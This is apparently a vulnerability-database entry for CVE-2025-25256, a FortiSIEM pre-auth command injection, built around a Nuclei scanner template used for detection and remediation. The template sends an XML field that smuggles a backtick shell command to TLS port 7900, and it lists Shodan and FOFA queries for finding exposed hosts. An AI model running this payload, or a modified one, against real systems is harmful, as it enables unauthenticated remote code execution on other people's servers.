Fortinet FortiSIEM - OS Command Injection

CVE-2025-25256
Verified

Description

Fortinet FortiSIEM versions later than 6.7.9 and up to and including 7.3.1 contain an OS command injection caused by improper neutralization of special elements in CLI requests, which lets unauthenticated remote attackers execute unauthorized commands.

Severity

Critical

CVSS Score

9.8

Exploit Probability

40%

Affected Product

fortisiem

Published Date

August 18, 2025

Template Author

watchtowr, darses

CVE-2025-25256.yaml
id: CVE-2025-25256

info:
  name: Fortinet FortiSIEM - OS Command Injection
  severity: critical
  author: watchtowr,darses
  description: |
    Fortinet FortiSIEM 6.7.9 < version <= 7.3.1 contains an OS command injection caused by improper neutralization of special elements in CLI requests, letting unauthenticated attackers execute unauthorized commands remotely.
  impact: |
    Unauthenticated attackers can execute arbitrary commands, potentially leading to full system compromise.
  remediation: |
    Update to the latest version beyond 7.3.1.
  classification:
    cve-id: CVE-2025-25256
    cwe-id: CWE-78
    cvss-metrics: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
    cvss-score: 9.8
    epss-percentile: 0.97353
    epss-score: 0.3956
    cpe: cpe:2.3:a:fortinet:fortisiem:*:*:*:*:*:*:*:*
  metadata:
    vendor: fortinet
    product: fortisiem
    shodan-query:
      - http.favicon.hash:-1341442175
      - http.html:"var hst = location.hostname"
    fofa-query:
      - icon_hash="-1341442175"
      - body="var hst = location.hostname"
  reference:
    - https://www.fortiguard.com/psirt/FG-IR-25-152
    - https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
    - https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/
  tags: cve,cve2025,rce,network,tcp,fortinet,vkev,vuln

variables:
  xml: |
    <root>
      <archive_storage_type>nfs</archive_storage_type>
      <archive_nfs_server_ip>127.0.0.1</archive_nfs_server_ip>
      <archive_nfs_archive_dir>`echo${IFS}/`</archive_nfs_archive_dir>
      <scope>local</scope>
    </root>
  payload: "\x5a\x00\x00\x00{{hex_decode(dec_to_hex(len(xml)))}}\x00\x00\x00\x6f\x42\x1e\x40\x00\x00\x00\x00{{xml}}"

tcp:
  - inputs:
      - data: "{{payload}}"

    host:
      - "tls://{{Hostname}}"
    port: 7900
    read-size: 1024

    matchers:
      - type: word
        part: raw
        words:
          - "\x01\x00\x00\x00"
# digest: 4a0a00473045022005fcad2bf5979666bbb8f24bef116a7b34d7929f1f6b73098325ffc91f119889022100cb187049ad775f7ed01551abe2d46c4d96a02c774df5ca34476d522deda69506:922c64590222798bb761d5b6d8e72950
CVSS Metrics

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2025-25256
CWE ID: CWE-78

References

https://www.fortiguard.com/psirt/FG-IR-25-152
https://github.com/watchtowrlabs/watchTowr-vs-FortiSIEM-CVE-2025-25256
https://labs.watchtowr.com/should-security-solutions-be-secure-maybe-were-all-wrong-fortinet-fortisiem-pre-auth-command-injection-cve-2025-25256/

Remediation Steps

Update to the latest version beyond 7.3.1.